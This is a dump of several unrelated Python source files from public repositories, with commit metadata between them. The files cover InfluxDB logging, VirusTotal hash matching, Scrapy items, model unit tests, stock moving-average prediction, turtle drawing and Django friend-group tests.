self.logger.error('database connection failed')
self.client = None
def on_logData(self):
datastream = self.logData.recv_pyobj()
for point in datastream:
tag, measurement, times, values = point
assert len(times) == len(values)
if self.client == None: return
for i in range(len(times)):
self.point_values.append({
"time" : datetime.fromtimestamp(times[i]).isoformat()+'Z',
"tags" : tag,
"measurement" : measurement,
"fields" : values[i]
})
# if len(self.point_values) >= BATCH_SIZE:
# self.logger.info(str(self.point_values))
self.client.write_points(self.point_values)
self.point_values = []
def __destroy__(self):
if self.client and self.db_drop:
self.client.drop_database(self.db_name)
| [
"purboday.ghosh@vanderbilt.edu"
] | purboday.ghosh@vanderbilt.edu |
b4690585fbf3c801c4aec722657c104880b028c8 | 74020bb83e915ee7f5da8b9dd3efc35bb142cb2a | /jsonreader.py | ab79acd9095c38cef165a36096ac69294bd519a8 | [] | no_license | SiddharthMalhotra/Code-Signing-PKI-Certificates | 62ce4124c97d9d8db9241906f697f7e9a5d8c72e | ede8eecd949d49f791a74259234519b739f69868 | refs/heads/master | 2020-05-30T15:57:19.741092 | 2019-11-19T03:32:33 | 2019-11-19T03:32:33 | 189,830,284 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 956 | py | import json
# path = '/Users/siddharth/Downloads/responses_windows_virushashes_316.json'
#
# with open(path, 'r') as jsonfile:
# for line in jsonfile:
# dict = json.loads(line)
# print(dict['md5'])
#
# for line in signedfile:
# print (line)
#path = ''
textfile = '/home/ubuntu/MyVolumeStore/textfile.txt'
with open('/home/ubuntu/MyVolumeStore/signedfile') as signedfile:
for line in signedfile:
for i in range(7,16):
filenumber = 300 + i
path = '/home/ubuntu/MyVolumeStore/Virustotal_Responses/responses_windows_virushashes_%d.json'%filenumber
with open (path) as responsefile:
for linejson in responsefile:
dict = json.loads(linejson)
if line == dict['md5']:
with open(textfile, 'w') as txte:
txte.write(linejson)
txte.flush()
| [
"codemalhotra@gmail.com"
] | codemalhotra@gmail.com |
5b772f0474910e3f52bb061eeaf15773a593dab4 | c57edb2fe918e6b33c5903dbc63b9bcbcf8f847f | /indeed_company_reviews/items.py | 21ebb81a2e41ec6c2e30fce63b486fcd6900858e | [
"MIT"
] | permissive | zehengl/scrapy-indeed-company-reviews | cf381b2f458624539057afe01880046444f12616 | 4e39c06037eb92a086c6351a9ef37c7225599715 | refs/heads/main | 2023-08-20T07:29:59.319654 | 2023-08-14T13:39:29 | 2023-08-14T13:39:29 | 213,436,914 | 5 | 1 | MIT | 2023-09-11T14:55:13 | 2019-10-07T16:48:16 | Python | UTF-8 | Python | false | false | 409 | py | # -*- coding: utf-8 -*-
# Define here the models for your scraped items
#
# See documentation in:
# https://docs.scrapy.org/en/latest/topics/items.html
import scrapy
class IndeedCompanyReviewsItem(scrapy.Item):
id = scrapy.Field()
rating = scrapy.Field()
text = scrapy.Field()
pros = scrapy.Field()
cons = scrapy.Field()
position = scrapy.Field()
date_created = scrapy.Field()
| [
"imzehengl@gmail.com"
] | imzehengl@gmail.com |
98e562ae114e7698df9aeb8eb0c5698b79ad77da | d860c407d7757f9ca8dc814a2b24a1687a98b9db | /ifmodels/tests/test_ifmodels.py | c6e4e0dc5f8741172ba1fe3552dd7f9772eab16c | [
"MIT"
] | permissive | serrob23/ifmodels | c6f34afb28f6561c49127619df5247ff04eb49ac | c39902d6d1ca79275f9c250fafd9fb07c7b09f48 | refs/heads/master | 2020-09-14T04:09:26.332819 | 2019-11-18T19:18:58 | 2019-11-18T19:18:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,949 | py | from __future__ import absolute_import, division, print_function
import os.path as op
import numpy as np
import pandas as pd
import numpy.testing as npt
import ifmodels as sb
data_path = op.join(sb.__path__[0], 'data')
def test_transform_data():
"""
Testing the transformation of the data from raw data to functions
used for fitting a function.
"""
# We start with actual data. We test here just that reading the data in
# different ways ultimately generates the same arrays.
ortho = pd.read_csv(op.join(data_path, 'ortho.csv'))
x1, y1, n1 = sb.transform_data(ortho)
x2, y2, n2 = sb.transform_data(op.join(data_path, 'ortho.csv'))
npt.assert_equal(x1, x2)
npt.assert_equal(y1, y2)
# We can also be a bit more critical, by testing with data that we
# generate, and should produce a particular answer:
my_data = pd.DataFrame(
np.array([[0.1, 2], [0.1, 1], [0.2, 2], [0.2, 2], [0.3, 1],
[0.3, 1]]),
columns=['contrast1', 'answer'])
my_x, my_y, my_n = sb.transform_data(my_data)
npt.assert_equal(my_x, np.array([0.1, 0.2, 0.3]))
npt.assert_equal(my_y, np.array([0.5, 0, 1.0]))
npt.assert_equal(my_n, np.array([2, 2, 2]))
def test_cum_gauss():
sigma = 1
mu = 0
x = np.linspace(-1, 1, 12)
y = sb.cumgauss(x, mu, sigma)
# A basic test that the input and output have the same shape:
npt.assert_equal(y.shape, x.shape)
# The function evaluated over items symmetrical about mu should be
# symmetrical relative to 0 and 1:
npt.assert_equal(y[0], 1 - y[-1])
# Approximately 68% of the Gaussian distribution is in mu +/- sigma, so
# the value of the cumulative Gaussian at mu - sigma should be
# approximately equal to (1 - 0.68/2). Note the low precision!
npt.assert_almost_equal(y[0], (1 - 0.68) / 2, decimal=2)
def test_opt_err_func():
# We define a truly silly function, that returns its input, regardless of
# the params:
def my_silly_func(x, my_first_silly_param, my_other_silly_param):
return x
# The silly function takes two parameters and ignores them
my_params = [1, 10]
my_x = np.linspace(-1, 1, 12)
my_y = my_x
my_err = sb.opt_err_func(my_params, my_x, my_y, my_silly_func)
# Since x and y are equal, the error is zero:
npt.assert_equal(my_err, np.zeros(my_x.shape[0]))
# Let's consider a slightly less silly function, that implements a linear
# relationship between inputs and outputs:
def not_so_silly_func(x, a, b):
return x * a + b
my_params = [1, 10]
my_x = np.linspace(-1, 1, 12)
# To test this, we calculate the relationship explicitely:
my_y = my_x * my_params[0] + my_params[1]
my_err = sb.opt_err_func(my_params, my_x, my_y, not_so_silly_func)
# Since x and y are equal, the error is zero:
npt.assert_equal(my_err, np.zeros(my_x.shape[0]))
def test_Model():
""" """
M = sb.Model()
x = np.linspace(0.1, 0.9, 22)
target_mu = 0.5
target_sigma = 1
target_y = sb.cumgauss(x, target_mu, target_sigma)
F = M.fit(x, target_y, initial=[target_mu, target_sigma])
npt.assert_equal(F.predict(x), target_y)
def test_params_regression():
"""
Test for regressions in model parameter values from provided data
"""
model = sb.Model()
ortho_x, ortho_y, ortho_n = sb.transform_data(op.join(data_path,
'ortho.csv'))
para_x, para_y, para_n = sb.transform_data(op.join(data_path,
'para.csv'))
ortho_fit = model.fit(ortho_x, ortho_y)
para_fit = model.fit(para_x, para_y)
npt.assert_almost_equal(ortho_fit.params[0], 0.46438638)
npt.assert_almost_equal(ortho_fit.params[1], 0.13845926)
npt.assert_almost_equal(para_fit.params[0], 0.57456788)
npt.assert_almost_equal(para_fit.params[1], 0.13684096)
| [
"hhelmbre@uw.edu"
] | hhelmbre@uw.edu |
51f4649bf759480ec9f0b4d51f2d6673e0ada97d | 785e23fbff3e696be7abdcac0aa5f42122008656 | /wax/utils.py | 72f8fa251c094d0d3664fa56974579073428c0be | [
"Apache-2.0",
"BSD-3-Clause",
"MIT"
] | permissive | zggl/wax-ml | 329c079944728d4f621f70f6b0af0b95c256c3ee | ab18e064f9fa1c95458978f501efb6cde9ab64d5 | refs/heads/main | 2023-05-30T17:56:15.739249 | 2021-06-14T05:32:17 | 2021-06-14T05:32:17 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,191 | py | # Copyright 2021 The WAX-ML Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Some utils functions used in WAX-ML."""
from jax import tree_flatten
def dict_map(fun, col):
return {key: fun(val) for key, val in col.items()}
def get_unique_dtype(current_values_):
# check of unique dtype
# TODO remove onece multi-dtype is supported
current_values_flat_, _ = tree_flatten(current_values_)
current_dtypes_ = set(map(lambda x: x.dtype.type, current_values_flat_))
assert (
len(current_dtypes_) == 1
), "multi-dtype not yet supported. TODO: manage multi-dtypes at Buffer level."
current_dtype_ = current_dtypes_.pop()
return current_dtype_
| [
"eserie@gmail.com"
] | eserie@gmail.com |
3448b0f6f83f62a63acde23c7dd30c2bb745738e | 06f1cc6a29ff6c012d4c97e18d385ee9f5e68510 | /tiktorch/server/__main__.py | 3f1cdfc204cb3c9d2cee8d332921c0458fea517d | [
"MIT"
] | permissive | Phhere/tiktorch | c9d076362efcdd5f5fb31da2b9acbc60b07648ac | 82f109b4d82dda4b63a5d93e5527fc409a9fd4c1 | refs/heads/master | 2022-12-01T07:26:14.738435 | 2020-07-01T17:15:37 | 2020-07-01T17:15:37 | 285,004,592 | 0 | 0 | MIT | 2020-08-04T14:26:50 | 2020-08-04T14:26:49 | null | UTF-8 | Python | false | false | 74 | py | import sys
from .base import main
if __name__ == "__main__":
main()
| [
"mnovikov.work@gmail.com"
] | mnovikov.work@gmail.com |
2b7fc1a39dba6cc34d44ed9341815126919b7b5c | 61a43dbd5ee615bf5e5f8f52e739efdfe5b57443 | /func.py | db6fd07e95a76f4f910b2633cfad4dcb6a878493 | [] | no_license | tianqibucuohao/MyPython | 6edef8fa2635862914af26f96b3fb630a0198403 | 12b9689882dc197128d1a27b68c9a2840a57d0fc | refs/heads/master | 2020-04-07T15:04:09.838646 | 2020-01-09T09:03:48 | 2020-01-09T09:03:48 | 158,471,961 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,313 | py | def fib(n):
a,b=0,1
while a<n:
print(a,end=' ')
a,b=b,a+b
def output(name, base,shuqiang, wuli, liliang,jineng,huangzi,baizi,baoji, zuizhong):
outsum=base * shuqiang/(220) * (1+wuli/100) \
* (1+liliang/100) \
* (1+huangzi) \
* (1+baizi) \
* (1+baoji) \
* (1+jineng) \
* (1+zuizhong)
print(name, "output:",outsum)
def main():
base=100
shuqiang=100
wuli=100
liliang=100
jineng=100
huangzi=0.0
baizi=0.0
baoji=0.0
zuizhong=0.0
output("now",base,shuqiang, wuli,liliang,jineng,huangzi,baizi,baoji,zuizhong)
# nowbaoji=baoji+0.5
# nowhuangzi=huangzi+0.2+0.1
# nowbaizi=baizi+0.33
# nowwuli=wuli+0.22+0.1
# nowzuizhong=zuizhong+0.2
# nowjineng=jineng+0.1+0.1
# nowshuqinag=shuqiang+60
# nowliliang=liliang+0.15
# output("90a",base,nowshuqinag,nowwuli,nowliliang,nowjineng,nowhuangzi, nowbaizi,nowbaoji,nowzuizhong)
#
# jineng95=jineng+0.17+0.1+0.1
# baizi95=baizi+0.19+0.1
# zuizhong95=zuizhong+0.2+0.2+0.1
# liliang95=liliang+0.18+0.15
# baoji95=baoji+0.19
# wuli95=wuli+0.64+0.22+0.1
# output("95a",base,nowshuqinag,wuli95,liliang95,jineng95,huangzi,baizi95,baoji95,zuizhong95)
if (__name__=="__main__") :
main() | [
"lichzhenglz@gmail.com"
] | lichzhenglz@gmail.com |
d254744b9ce6435292926760131839bbb3f92a19 | 74636ca1845d0547acc3420ffa91ebcc31534b14 | /maxFunctions.py | 31c1672870b408af64c08d8eb27f0c5c690a2e44 | [] | no_license | Maksym-Gorbunov/python1 | 3f61e89aef6098b44bda3419f4a7c1ea74f7ad58 | b700e5fe625548c3975ad3aad062302f3791f61f | refs/heads/master | 2020-03-07T19:44:38.091739 | 2018-04-10T11:50:09 | 2018-04-10T11:50:09 | 127,679,175 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 138 | py | def hello(name):
print ('Hello ' + name.capitalize() + ',\nWelkome onboard!')
#print ('Hello', name.capitalize(), ',\nWelkome onboard!') | [
"maxsverige@hotmail.com"
] | maxsverige@hotmail.com |
351b07b6aa81c5d1c935735b8eb4427e0f537c99 | e97f23138816994d17586e0f64a7dfa8bd72c421 | /app/forms.py | f21f7c41fa2005d3a5ece287c093e49973a026d6 | [] | no_license | thtruo/microblog | 4f9aaabcd7489b8b750a74efae3d2842c13fd56a | 0eb5268cdc94ab71f067c1a99ca5676602784022 | refs/heads/master | 2020-06-07T06:41:56.391028 | 2014-02-07T21:38:05 | 2014-02-07T21:38:05 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 262 | py | from flask.ext.wtf import Form
from wtforms import TextField, BooleanField
from wtforms.validators import Required
class LoginForm(Form):
openid = TextField('openid', validators = [Required()])
remember_me = BooleanField('remember me', default = False)
| [
"ttruongchau@gmail.com"
] | ttruongchau@gmail.com |
d04cf7fede3b16a342b169e8aeeb36e1e13ddd33 | 7bd08408726c2c9e5314ccaa8d6b59913b5858a9 | /src/selfcoin/node/ui/access.py | a286cc7719123124a11749337ff90784966a480b | [
"MIT"
] | permissive | wangyubin112/selfcoin | 1251064771e592aee7f82c766ba6fdbc9d204fed | f53528645f7d500108c7a258f07a2551f933ce7b | refs/heads/master | 2020-04-26T13:41:47.285025 | 2019-03-19T01:42:16 | 2019-03-19T01:42:16 | 173,587,318 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,030 | py | from tkinter import *
section = 2
x = 0.05
y = 0.15/6*section
x_col = 5
font_size = ('Arial')
def access(ui):
ui.regist_frame = Frame(ui.tab_access)
ui.login_frame = Frame(ui.tab_access)
ui.regist_frame.place(relx = 0, rely = 0, relwidth=1.0, relheight=1.0/section)
ui.login_frame.place(relx = 0, rely = 1.0/section, relwidth=1.0, relheight=1.0/section)
# regist
ui.regist_name_label = Label(ui.regist_frame, text = 'name:',font=font_size)
ui.regist_name_label.place(relx=x, rely=y)
ui.regist_name_entry = Entry(ui.regist_frame, show = None, width=50)
ui.regist_name_entry.place(relx = x_col * x, rely=y)
ui.regist_ID_real_label = Label(ui.regist_frame, text = 'real ID:',font=font_size)
ui.regist_ID_real_label.place(relx=x, rely=2*y)
ui.regist_ID_real_entry = Entry(ui.regist_frame, show = None, width=50)
ui.regist_ID_real_entry.place(relx = x_col * x, rely=2*y)
ui.regist_status = StringVar()
ui.regist_status.set('regist')
ui.regist_button = Button(ui.regist_frame, textvariable = ui.regist_status,
command = lambda : ui.handler(ui.regist))
ui.regist_button.place(relx = x_col* x, rely = 3*y)
# login/logout
ui.login_label = Label(ui.login_frame, text = 'name:',font=font_size)
ui.login_label.place(relx=x,rely=y)
ui.login_entry = Entry(ui.login_frame, show = None, width=50)
ui.login_entry.place(relx = x_col* x, rely = y)
ui.login_status = StringVar()
ui.login_status.set('login')
ui.login_button = Button(ui.login_frame, textvariable = ui.login_status,
command = lambda : ui.handler(ui.login))
ui.login_button.place(relx = x_col * x, rely = 2*y)
ui.logout_status = StringVar()
ui.logout_status.set('logout')
ui.logout_button = Button(ui.login_frame, textvariable = ui.logout_status,
command = lambda : ui.handler(ui.logout), state = 'disable')
ui.logout_button.place(relx = x_col * x, rely = 4*y)
| [
"noreply@github.com"
] | wangyubin112.noreply@github.com |
f0ae133e7bf186976ce43043d3ba3f0c7f0bbb9f | 9768e9dfef5e242d5c2604f46177a7b77345b2cc | /practice/201710963_12-02.py | 2252ee750b268059e5d05bb69e26fa82b9739b72 | [] | no_license | kjee99/CT-201710963 | f1bc482752f825171091042718d6454254a7241f | dc4f6de5a553b51ffe99229baa076dbd5decd24a | refs/heads/master | 2021-01-19T09:37:41.625452 | 2017-05-29T08:12:19 | 2017-05-29T08:12:19 | 87,774,769 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,051 | py | import turtle
wn=turtle.Screen()
t1=turtle.Turtle()
width=wn.window_width()
w3=width/3
x1=0.0-w3
x2=0.0
x3=0.0+w3
def drawSquare(size) :
for i in range(1,5) :
t1.fd(size)
t1.rt(90)
drawSquare(100)
t1.clear()
def triangle(size) :
for i in range(1,4) :
t1.fd(size)
t1.lt(120)
def pentagon(size) :
for i in range(1,6) :
t1.fd(size)
t1.lt(72)
def star(size) :
t1.fd(size)
t1.rt(150)
t1.fd(size)
t1.rt(150)
t1.fd(size)
t1.rt(150)
t1.fd(size)
t1.rt(135)
t1.fd(size)
def drawTriangleAt(x,y,size) :
t1.penup()
t1.goto(x,y)
t1.pendown()
t1.setheading(0)
triangle(size)
def drawPentagonAt(x,y,size) :
t1.penup()
t1.goto(x,y)
t1.pendown()
t1.setheading(0)
pentagon(size)
def drawStarAt(x,y,size) :
t1.penup()
t1.goto(x,y)
t1.pendown()
t1.setheading(0)
star(size)
drawTriangleAt(x1,0,100)
drawPentagonAt(x2,0,100)
drawStarAt(x3,0,100)
wn.exitonclick() | [
"noreply@github.com"
] | kjee99.noreply@github.com |
c32addfe05a464d16e025942398d9df189cfe880 | 110e9eb02d6c887a03eedc49ab65c0f70370c139 | /test/machine_learning.py | 08ce4867bfe40ef8685a8478a1b938abbbe62594 | [] | no_license | tylermoore19/stock-predictor | 7135d5e2e0d9b82654a370084ee43d1d46452e09 | 6ef6c3697407e6b13986bbd0d31ca4fa1f5ffa85 | refs/heads/master | 2022-07-18T00:02:17.157060 | 2019-10-30T21:48:14 | 2019-10-30T21:48:14 | 208,937,087 | 0 | 0 | null | 2022-06-22T02:58:13 | 2019-09-17T02:02:28 | Python | UTF-8 | Python | false | false | 6,750 | py | import math
import matplotlib
import numpy as np
import pandas as pd
import seaborn as sns
import time
import datetime
import pandas_datareader.data as web
from datetime import date, datetime, time, timedelta
from matplotlib import pyplot as plt
from pylab import rcParams
from sklearn.linear_model import LinearRegression
from sklearn.metrics import mean_squared_error
from tqdm import tqdm_notebook
test_size = 0.2 # proportion of dataset to be used as test set
cv_size = 0.2 # proportion of dataset to be used as cross-validation set
Nmax = 2 # for feature at day t, we use lags from t-1, t-2, ..., t-N as features
# Nmax is the maximum N we are going to test
fontsize = 14
ticklabelsize = 14
def get_preds_mov_avg(df, target_col, N, pred_min, offset):
"""
Given a dataframe, get prediction at timestep t using values from t-1, t-2, ..., t-N.
Using simple moving average.
Inputs
df : dataframe with the values you want to predict. Can be of any length.
target_col : name of the column you want to predict e.g. 'adj_close'
N : get prediction at timestep t using values from t-1, t-2, ..., t-N
pred_min : all predictions should be >= pred_min
offset : for df we only do predictions for df[offset:]. e.g. offset can be size of training set
Outputs
pred_list : list. The predictions for target_col. np.array of length len(df)-offset.
"""
pred_list = df[target_col].rolling(window = N, min_periods=1).mean() # len(pred_list) = len(df)
# Add one timestep to the predictions
pred_list = np.concatenate((np.array([np.nan]), np.array(pred_list[:-1])))
# If the values are < pred_min, set it to be pred_min
pred_list = np.array(pred_list)
pred_list[pred_list < pred_min] = pred_min
return pred_list[offset:]
def get_mape(y_true, y_pred):
"""
Compute mean absolute percentage error (MAPE)
"""
y_true, y_pred = np.array(y_true), np.array(y_pred)
return np.mean(np.abs((y_true - y_pred) / y_true)) * 100
# end = datetime.today() + timedelta(0)
# start = end + timedelta(-730)
end = datetime(2019, 8, 20)
start = datetime(2017, 8, 20)
df = web.DataReader('^IXIC', 'yahoo', start, end)
df = df.reset_index()
# Convert Date column to datetime
df.loc[:, 'Date'] = pd.to_datetime(df['Date'],format='%Y-%m-%d')
# Change all column headings to be lower case, and remove spacing
df.columns = [str(x).lower().replace(' ', '_') for x in df.columns]
# # Get month of each sample
# df['month'] = df['date'].dt.month
# Sort by datetime
df.sort_values(by='date', inplace=True, ascending=True)
# Get sizes of each of the datasets
num_cv = int(cv_size*len(df))
num_test = int(test_size*len(df))
num_train = len(df) - num_cv - num_test
print("num_train = " + str(num_train))
print("num_cv = " + str(num_cv))
print("num_test = " + str(num_test))
# Split into train, cv, and test
train = df[:num_train]
cv = df[num_train:num_train+num_cv]
train_cv = df[:num_train+num_cv]
test = df[num_train+num_cv:]
print("train.shape = " + str(train.shape))
print("cv.shape = " + str(cv.shape))
print("train_cv.shape = " + str(train_cv.shape))
print("test.shape = " + str(test.shape))
# Plot adjusted close over time
# rcParams['figure.figsize'] = 10, 8 # width 10, height 8
# matplotlib.rcParams.update({'font.size': 14})
# ax = train.plot(x='date', y='adj_close', style='b-', grid=True)
# ax = cv.plot(x='date', y='adj_close', style='y-', grid=True, ax=ax)
# ax = test.plot(x='date', y='adj_close', style='g-', grid=True, ax=ax)
# ax.legend(['train', 'validation', 'test'])
# ax.set_xlabel("date")
# ax.set_ylabel("USD")
# plt.show()
RMSE = []
mape = []
for N in range(1, Nmax+1): # N is no. of samples to use to predict the next value
est_list = get_preds_mov_avg(train_cv, 'adj_close', N, 0, num_train)
cv['est' + '_N' + str(N)] = est_list
RMSE.append(math.sqrt(mean_squared_error(est_list, cv['adj_close'])))
mape.append(get_mape(cv['adj_close'], est_list))
print('RMSE = ' + str(RMSE))
print('MAPE = ' + str(mape))
# Set optimum N
N_opt = 1
# Plot adjusted close over time
# rcParams['figure.figsize'] = 10, 8 # width 10, height 8
# matplotlib.rcParams.update({'font.size': 14})
# ax = train.plot(x='date', y='adj_close', style='b-', grid=True)
# ax = cv.plot(x='date', y='adj_close', style='y-', grid=True, ax=ax)
# ax = test.plot(x='date', y='adj_close', style='g-', grid=True, ax=ax)
# ax = cv.plot(x='date', y='est_N1', style='r-', grid=True, ax=ax)
# ax = cv.plot(x='date', y='est_N2', style='m-', grid=True, ax=ax)
# ax.legend(['train', 'validation', 'test', 'predictions with N=1', 'predictions with N=2'])
# ax.set_xlabel("date")
# ax.set_ylabel("USD")
# plt.show()
est_list = get_preds_mov_avg(df, 'adj_close', N_opt, 0, num_train+num_cv)
test['est' + '_N' + str(N_opt)] = est_list
print("RMSE = %0.3f" % math.sqrt(mean_squared_error(est_list, test['adj_close'])))
print("MAPE = %0.3f%%" % get_mape(test['adj_close'], est_list))
# Plot adjusted close over time
# rcParams['figure.figsize'] = 10, 8 # width 10, height 8
# ax = train.plot(x='date', y='adj_close', style='b-', grid=True)
# ax = cv.plot(x='date', y='adj_close', style='y-', grid=True, ax=ax)
# ax = test.plot(x='date', y='adj_close', style='g-', grid=True, ax=ax)
# ax = test.plot(x='date', y='est_N1', style='r-', grid=True, ax=ax)
# ax.legend(['train', 'validation', 'test', 'predictions with N_opt=1'])
# ax.set_xlabel("date")
# ax.set_ylabel("USD")
# matplotlib.rcParams.update({'font.size': 14})
# Plot adjusted close over time
# rcParams['figure.figsize'] = 10, 8 # width 10, height 8
# ax = train.plot(x='date', y='adj_close', style='bx-', grid=True)
# ax = cv.plot(x='date', y='adj_close', style='yx-', grid=True, ax=ax)
# ax = test.plot(x='date', y='adj_close', style='gx-', grid=True, ax=ax)
# ax = test.plot(x='date', y='est_N1', style='rx-', grid=True, ax=ax)
# ax.legend(['train', 'validation', 'test', 'predictions with N_opt=1'], loc='upper left')
# ax.set_xlabel("date")
# ax.set_ylabel("USD")
# ax.set_xlim([date(2019, 4, 1), date(2019, 8, 20)])
# ax.set_ylim([7500, 8500])
# ax.set_title('Zoom in to test set')
# Plot adjusted close over time, only for test set
rcParams['figure.figsize'] = 10, 8 # width 10, height 8
matplotlib.rcParams.update({'font.size': 14})
ax = test.plot(x='date', y='adj_close', style='gx-', grid=True)
ax = test.plot(x='date', y='est_N1', style='rx-', grid=True, ax=ax)
ax.legend(['test', 'predictions using last value'], loc='upper left')
ax.set_xlabel("date")
ax.set_ylabel("USD")
ax.set_xlim([date(2019, 4, 1), date(2019, 8, 20)])
ax.set_ylim([7500, 8500])
plt.show()
| [
"tmoorebb19@gmail.com"
] | tmoorebb19@gmail.com |
0b52f95719a03bb4ab96e7b7a11a1043421d193e | 73c030f579ab33622860b1efd4c059bfbbdb0b32 | /camelot/tests/test_groups.py | 2afe0334524f7dd5407d6f2e35d3d5d804b1507f | [] | no_license | uninico/project-camelot | 6b7e60fe50583223c3c1055a70a7014281fd5df3 | d01dc5adec4473c0baaefdc7c3d82720c274368a | refs/heads/master | 2020-03-21T17:16:41.710871 | 2018-06-24T07:27:37 | 2018-06-24T07:27:37 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,651 | py | from django.test import TestCase
from django.contrib.auth.models import User
from django.shortcuts import reverse
from .test_friendship import FriendGroupControllerTests
from ..controllers.groupcontroller import groupcontroller, is_in_group
from ..controllers.utilities import PermissionException
from .helperfunctions import complete_add_friends
from ..models import FriendGroup
class GroupControllerTests(FriendGroupControllerTests):
"""
Controller tests for friendgroups
"""
def setUp(self):
super().setUp()
# send login data - these commented lines are for view testing
#response = self.client.post('', self.credentials, follow=True)
#self.factory = RequestFactory()
self.groupcontrol = groupcontroller(self.u.id)
self.groupcontrol2 = groupcontroller(self.friend.id)
def test_create_group(self):
name = "Test New Group"
newgroup = self.groupcontrol.create(name)
myquery = FriendGroup.objects.filter(owner=self.u.profile, name=name)
assert len(myquery) == 1
assert newgroup == myquery[0]
def test_create_group_redundant_name(self):
pass
def test_delete_group(self):
name = "Test Delete"
newgroup = self.groupcontrol.create(name)
# some rando can't delete
self.assertRaises(PermissionException, self.groupcontrol2.delete_group, newgroup)
newgroup.refresh_from_db()
# friend can't delete
complete_add_friends(self.u.id, self.friend.id)
self.assertRaises(PermissionException, self.groupcontrol2.delete_group, newgroup)
newgroup.refresh_from_db()
# delete empty group
assert self.groupcontrol.delete_group(newgroup)
self.assertRaises(FriendGroup.DoesNotExist, newgroup.refresh_from_db)
# reset
newgroup = self.groupcontrol.create(name)
# group member can't delete
assert self.groupcontrol.add_member(newgroup.id, self.friend.profile)
self.assertRaises(PermissionException, self.groupcontrol2.delete_group, newgroup)
newgroup.refresh_from_db()
# delete group with member
assert self.groupcontrol.delete_group(newgroup)
self.assertRaises(FriendGroup.DoesNotExist, newgroup.refresh_from_db)
# confirm that friend still exists
self.friend.profile.refresh_from_db()
def test_delete_member(self):
name = "Test Delete Member"
newgroup = self.groupcontrol.create(name)
complete_add_friends(self.u.id, self.friend.id)
# owner can delete members
assert self.groupcontrol.add_member(newgroup.id, self.friend.profile)
assert len(newgroup.members.all()) == 1
assert self.groupcontrol.delete_member(newgroup, self.friend.profile)
assert len(newgroup.members.all()) == 0
# friend cannot delete member from group
assert self.groupcontrol.add_member(newgroup.id, self.friend.profile)
assert len(newgroup.members.all()) == 1
self.assertRaises(PermissionException, self.groupcontrol2.delete_member, newgroup, self.friend.profile)
assert len(newgroup.members.all()) == 1
def test_add_member(self):
name = "Test Add Member"
newgroup = self.groupcontrol.create(name)
# can't add user to group who is not a friend
assert not self.groupcontrol.add_member(newgroup.id, self.friend.profile)
assert len(newgroup.members.all()) == 0
# become friends
self.friendcontrol.add(self.friend.profile)
self.otherfriendcontrol.confirm(self.u.profile)
# now can add to group
assert self.groupcontrol.add_member(newgroup.id, self.friend.profile)
assert len(newgroup.members.all()) == 1
# cannot add user to group twice
assert not self.groupcontrol.add_member(newgroup.id, self.friend.profile)
assert len(newgroup.members.all()) == 1
# can't add other user to group
assert not self.groupcontrol.add_member(newgroup.id, self.friend2.profile)
assert len(newgroup.members.all()) == 1
# become friends
self.friendcontrol.add(self.friend2.profile)
self.otherfriendcontrol2.confirm(self.u.profile)
# now it's all good
assert self.groupcontrol.add_member(newgroup.id, self.friend2.profile)
assert len(newgroup.members.all()) == 2
# add coverage for if we try to add to another user's group
def test_return_groups(self):
"""
Every user should be able to access another user's groups
because this is how permissions are determined
"""
# create a group for first user
name1 = "Test New Group 1"
newgroup1 = self.groupcontrol.create(name1)
# will return self.u's groups
ret1 = self.groupcontrol.return_groups()
assert len(ret1) == 1
assert ret1[0] == newgroup1
# create a group for second user
name2 = "Test New Group 2"
newgroup2 = self.groupcontrol2.create(name2)
# will return self.friend's groups
ret2 = self.groupcontrol.return_groups(self.friend.profile)
assert len(ret2) == 1
assert ret2[0] == newgroup2
# create a second group for self.friend
name3 = "Test New Group 3"
newgroup3 = self.groupcontrol2.create(name3)
# self.u will access
ret3 = self.groupcontrol.return_groups(self.friend.profile)
assert len(ret3) == 2
assert ret3[0] == newgroup2
assert ret3[1] == newgroup3
# todo: test none case
def test_is_in_group(self):
"""
Test utility to check if a profile is in a given group
Before adding to group return false
After return true
"""
name = "Test in group"
newgroup = self.groupcontrol.create(name)
assert not is_in_group(newgroup, self.friend.profile)
complete_add_friends(self.u.id, self.friend.id)
self.groupcontrol.add_member(newgroup.id, self.friend.profile)
assert is_in_group(newgroup, self.friend.profile)
from django.test.client import RequestFactory
from ..view.group import *
class GroupViewTests(TestCase):
def setUp(self):
# this is identical for the setup to albumviewtests, need to share code
self.credentials = {
'username': 'testuser',
'email': 'user@test.com',
'password': 'secret'}
self.u = User.objects.create_user(**self.credentials)
self.u.save()
self.credentials = {
'username': 'testuser2',
'email': 'user2@test.com',
'password': 'secret'}
self.u2 = User.objects.create_user(**self.credentials)
self.u2.save()
# send login data
#response = self.client.post('', self.credentials, follow=True)
self.factory = RequestFactory()
def test_manage_groups_view(self):
"""
should return 200 when we request manage_groups view as logged in user
TODO: need to figure out how to test for non logged in user
TODO: test that a user can't get another user's pro
"""
request = self.factory.get(reverse("manage_groups"))
request.user = self.u
request.session = {}
#response = manage_groups(request)
#self.assertEqual(response.status_code, 302)
# log in
response = self.client.post('', self.credentials, follow=True)
response = manage_groups(request)
# now that we are logged in, success
self.assertEqual(response.status_code, 200) | [
"docz2a@gmail.com"
] | docz2a@gmail.com |
e1637b7f741728735c034ebbe450f6c0aeb64e01 | 6fe86ea636a69fff9174df6407839f0164407bdb | /tt/eigb/__init__.py | 90b6c77717b67f7caf596ea94e9d91d333bf979c | [
"MIT"
